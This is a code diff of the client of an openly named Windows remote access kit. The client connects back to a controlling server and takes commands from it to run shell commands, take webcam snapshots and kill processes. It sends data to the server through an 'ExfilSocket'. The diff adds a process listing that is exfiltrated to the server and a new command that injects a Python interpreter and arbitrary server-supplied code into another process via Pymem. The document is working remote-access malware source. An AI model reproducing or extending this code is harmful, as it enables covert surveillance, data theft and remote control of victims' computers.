10
10
# [A Remote Access Kit for Windows]
11
11
# Author: SlizBinksman
12
12
# Github: https://github.com/slizbinksman
13
- # Build: 1.0.21
13
+ # Build: 1.0.22
14
14
# -------------------------------------------------------------
15
15
16
16
import socket
22
22
import threading
23
23
import struct
24
24
import cv2
25
-
25
+ import psutil
26
26
from PIL import ImageGrab
27
27
from time import sleep
28
28
from cryptography .fernet import Fernet
29
+ from pymem import Pymem
29
30
30
31
SEP = '<sep>' #Create static seperator string
31
32
BUFFER = 4096 #Create static buffer int
@@ -57,12 +58,6 @@ def get_windows_version(self):
57
58
version_output = version_output .replace ('\n ' ,'' ) #Replace new line with empty string
58
59
return version_output .strip ('\r ' ) #Strip carriage return and return the output
59
60
60
- #Function will return the output of all running process's on the machine
61
- def get_running_process (self ):
62
- command = subprocess .Popen (['powershell' , 'get-process' ],stdout = subprocess .PIPE ,shell = True ) #Run the command
63
- com_output = command .stdout .read ().decode () #Capture, read and decode output
64
- return com_output #Return output
65
-
66
61
#Function will get computers local ip and return it as string
67
62
def get_local_ip (self ):
68
63
local_ip = socket .gethostbyname (socket .gethostname ()) #Resolve system name
@@ -116,8 +111,17 @@ def shutdown_computer(self):
116
111
117
112
#Function will send back a list of running process's to the server
118
113
def extract_process_list (self ):
119
- process_list = Utilitys ().get_running_process () #Get process's
120
- ExfilSocket ().exfil_socket_send (process_list ) #Send to server
114
+ process_string = '' # Define a local string to store information about the process's
115
+ for process in psutil .process_iter (): # For each process found in the running process's
116
+ process_name = process .name () # Get process name
117
+ pid = process .pid # Get pid of process
118
+ try :
119
+ username = process .username () # Get username
120
+ except psutil .AccessDenied :
121
+ username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname.
122
+ string = f'{ process_name } { SEP } { str (pid )} { SEP } { username } { SEP } \n ' #Create string
123
+ process_string += string # Append string to local master string
124
+ ExfilSocket ().exfil_socket_send (process_string ) #Send local master string to server
121
125
122
126
#Function will kill a task by the pid passed as parameter and send the output to the server
123
127
def kill_task (self ,pid ):
@@ -162,6 +166,7 @@ def __init__(self):
162
166
self .process_manager = 'proc_list'
163
167
self .term_process = 'terminate'
164
168
self .snapshot = 'snap_shot'
169
+ self .inject_python = 'inject_pie'
165
170
166
171
#Function will connect to server to initiate handshake
167
172
def connect_to_server (self ):
@@ -259,6 +264,8 @@ def main(self):
259
264
SystemManager ().kill_task (server_command [1 ]) #kill the task by pid received from server
260
265
if action_flag == self .snapshot : #if the action is to send a snapshot from the webcam
261
266
StreamSocket ().webcam_snapshot () #Send a webcam snapshot
267
+ if action_flag == self .inject_python : #If the action is to inject some python code,
268
+ CodeExecution ().inject_and_exec (server_command [1 ],server_command [2 ]) #Inject python code
262
269
263
270
#Function will retrieve all data sent by server socket
264
271
def recv_all_data (self ):
@@ -379,4 +386,11 @@ def exec_(system_command): #Create local exec function
379
386
pass
380
387
MultiProcessor ().start_child_thread_arg (exec_ ,system_command ) #Start new thread for shell commands. Main thread will continue to communicate with server
381
388
389
+ #Function will inject a python interpreter into a process and then load
390
+ #Python code to be executed by it.
391
+ def inject_and_exec (self ,process_name ,python_code ):
392
+ process = Pymem (process_name ) #Hooke the process
393
+ process .inject_python_interpreter () #Inject the python dll
394
+ process .inject_python_shellcode (python_code ) #Inject the python code into the code
395
+
382
396
ClientSocket ().connect_to_server ()